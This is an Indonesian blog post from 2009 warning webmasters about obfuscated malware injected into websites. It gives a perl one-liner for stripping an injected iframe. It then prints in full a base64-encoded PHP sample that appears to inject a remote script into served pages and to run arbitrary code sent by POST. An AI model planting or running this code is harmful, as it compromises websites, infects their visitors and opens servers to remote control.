Payah jika, Injeksi Malware dengan Script yang terenkripsi

Hadi Suwantoro   December 10, 2009   1 Comment on Payah jika, Injeksi Malware dengan Script yang terenkripsi

Haizz ngga semua injeksi iframe / script codenya bisa dibaca dengan kasat mata,  ataupun pinginya dengan se-enaknya mengeksekusi peritah shell berikut

# find . -name ‘*.*’ | xargs perl -pi -e ’s/<iframe src.*vistasearch.info.*$</iframe>//g’

dengan tujuan menghapus script secara global tanpa perlu melakukan e diting satu – per – satu pada  setiap file.  silahkan baca bahasan website  diblokir google akibat injeksi iframe untuk lebih jelasnya cara eksekusi perintah shell tersebut.

dan ketika script injeksi yang masuk kedalam website anda seperti ini

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnaXF1MTInKSl7ZnVuY3Rpb24gaXF1MTIoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMlpoYzNSaFkzUnBiMjV3Y205alpYTnphVzVuTG1OdmJTOXBiV0ZuWlhNdmIzVjBjMjkxY21OcGJtY3RiVzl5ZEdkaFoyVXRjSEp2WTJWemMybHVaeTV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIGlxdTEyMigkYSwkYiwkYywkZCl7Z2xvYmFsJGlxdTEyMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkaXF1MTIxKSljYWxsX3VzZXJfZnVuYygkaXF1MTIxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdpcXUxMicpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2lxdTEyJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGlxdTEybD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignaXF1MTIyJykpIT0naXF1MTIyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>

Maka bersiap-siaplah bongkar setiap file yang ada.

akhir-kata berhati-hatilah dalam berselancar di dunia maya apalagi copy paste script karena buktinya website Broker Review aja Terkena Malware apalagi blog kita.

Share your vote!


Do you like this post?
  • Fascinated
  • Happy
  • Sad
  • Angry
  • Bored
  • Afraid

Subscribe / Langganan Artikel

Nama

Email Address

Dapatkan Info terbaru via Feedburner

Masukan email anda untuk mendapatkan artikel terbaru:

About Hadi Suwantoro

Sehari-hari ya bagian Monitoring, Review, Pembuat dokumentasi, Penulis tutorial dan Googling. Circle me

One thought on “Payah jika, Injeksi Malware dengan Script yang terenkripsi

Leave a Reply

Your email address will not be published. Required fields are marked *